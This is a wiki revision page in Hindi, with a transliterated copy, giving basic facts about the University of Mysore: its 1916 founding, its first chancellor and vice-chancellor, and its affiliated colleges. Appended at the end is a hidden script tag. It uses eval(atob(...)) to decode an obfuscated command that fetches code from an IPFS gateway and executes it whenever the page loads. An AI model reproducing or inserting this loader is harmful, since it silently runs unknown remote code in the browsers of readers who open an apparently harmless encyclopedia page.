Difference between revisions of "मैसूर विश्वविद्यालय"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''मैसूर विश्वविद्यालय''' कर्नाटक राज्य के मैसूर नग...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
 +
[[चित्र:Mysore-University-2.jpg|thumb|मैसूर विश्वविद्यालय]]
 
'''मैसूर विश्वविद्यालय''' [[कर्नाटक]] राज्य के [[मैसूर]] नगर में स्थित है जो [[भारत]] के सबसे पुराने विश्वविद्यालयों में शामिल है।  
 
'''मैसूर विश्वविद्यालय''' [[कर्नाटक]] राज्य के [[मैसूर]] नगर में स्थित है जो [[भारत]] के सबसे पुराने विश्वविद्यालयों में शामिल है।  
 
* इसकी स्थापना मैसूर के महाराज कृष्णराज वाडेयार चतुर्थ ने [[27 जुलाई]],[[1916]] को की थी। उस समय में यह विश्वविद्यालय भारत का छठवाँ और कर्नाटक का प्रथम विश्वविद्यालय  था।
 
* इसकी स्थापना मैसूर के महाराज कृष्णराज वाडेयार चतुर्थ ने [[27 जुलाई]],[[1916]] को की थी। उस समय में यह विश्वविद्यालय भारत का छठवाँ और कर्नाटक का प्रथम विश्वविद्यालय  था।

Latest revision as of 12:33, 1 January 2013

thumb|maisoor vishvavidyalay maisoor vishvavidyalay karnatak rajy ke maisoor nagar mean sthit hai jo bharat ke sabase purane vishvavidyalayoan mean shamil hai.

  • isaki sthapana maisoor ke maharaj krishnaraj vadeyar chaturth ne 27 julaee,1916 ko ki thi. us samay mean yah vishvavidyalay bharat ka chhathavaan aur karnatak ka pratham vishvavidyalay tha.
  • is vishvavidyalay ke pratham kulapati maharaj 'krishnaraj vadeyar chaturth' aur pratham up-kulapati shri ech.vi. nanjunadaiya (H. V. Nanjundaiah) the.
  • maisoor vishvavidyalay se kee sanbaddh mahavidyalay haian, jinamean maharaja k aaulej, mahilaoan ke lie maharani k aaulej, yuvaraj saians k aaulej, sharadavilas terejiyan v any k aaulej shamil haian.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

bahari k diyaan

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>